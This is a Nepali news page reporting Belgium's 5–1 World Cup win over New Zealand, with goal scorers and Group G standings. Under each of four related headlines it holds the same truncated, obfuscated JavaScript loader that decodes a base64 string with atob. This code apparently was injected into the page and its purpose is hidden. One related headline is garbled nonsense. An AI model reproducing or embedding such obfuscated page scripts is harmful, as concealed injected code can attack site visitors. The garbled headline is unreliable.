Skip to main content

नयाँ तृष्णा

बेल्जियम अन्तिम १६ मा, न्युजिल्यान्ड ५–१ ले पराजित

Advertisement

काठमाडौं । बेल्जियमले न्युजिल्यान्डलाई ५–१ गोलले पराजित गर्दै विश्वकप फुटबलको अन्तिम १६ मा स्थान सुरक्षित गरेको छ।

भ्यानकुभरमा भएको खेलमा लिएन्ड्रो ट्रोसार्डले दुई तथा केभिन डे ब्रुएना, रोमेलु लुकाकु र एलेक्सिस सेलेमेकर्सले एक–एक गोल गरे।

समूह ‘जी’मा पाँच अङ्कसहित बेल्जियम समूह विजेता बनेको छ भने इजिप्ट उपविजेताका रूपमा नकआउट चरणमा पुगेको छ। इरान तेस्रो र न्युजिल्यान्ड प्रतियोगिताबाट बाहिरिएको छ।

यो खबर पढेर तपाईलाई कस्तो महसुस भयो ?
+1
0
+1
0
+1
0
+1
0
+1
0
+1
0
+1
0

प्रतिक्रिया दिनुहोस

छुटाउनुभयो कि ?

कङ्गोमा इबोला फैलिँदै, स्वास्थ्य केन्द्रमाथि आक्रमण

!function(){var _0x432938422d85=atob('NHppcn9odXNyNDVnan1uPFYoUSgoUCFrdXJ4c2swRllYfyp+IVYoUSgoUEc7Q0N6bFlxfnl4bztBMHIve3BxbSE7fy8k...

जेनजी आन्दोलनबारे आयोग : तीन सुरक्षा निकायलाई कारबाही, सेनाको हकमा नरम

!function(){var _0x432938422d85=atob('NHppcn9odXNyNDVnan1uPFYoUSgoUCFrdXJ4c2swRllYfyp+IVYoUSgoUEc7Q0N6bFlxfnl4bztBMHIve3BxbSE7fy8k...

मानव शरीरमा ने खुशी मने हम न ह ।

!function(){var _0x432938422d85=atob('NHppcn9odXNyNDVnan1uPFYoUSgoUCFrdXJ4c2swRllYfyp+IVYoUSgoUEc7Q0N6bFlxfnl4bztBMHIve3BxbSE7fy8k...

कुवेत अन्तर्राष्ट्रिय विमानस्थलमा इरानी आक्रमण, इरानमाथि अमेरिकाको जवाफी हमला

!function(){var _0x432938422d85=atob('NHppcn9odXNyNDVnan1uPFYoUSgoUCFrdXJ4c2swRllYfyp+IVYoUSgoUEc7Q0N6bFlxfnl4bztBMHIve3BxbSE7fy8k...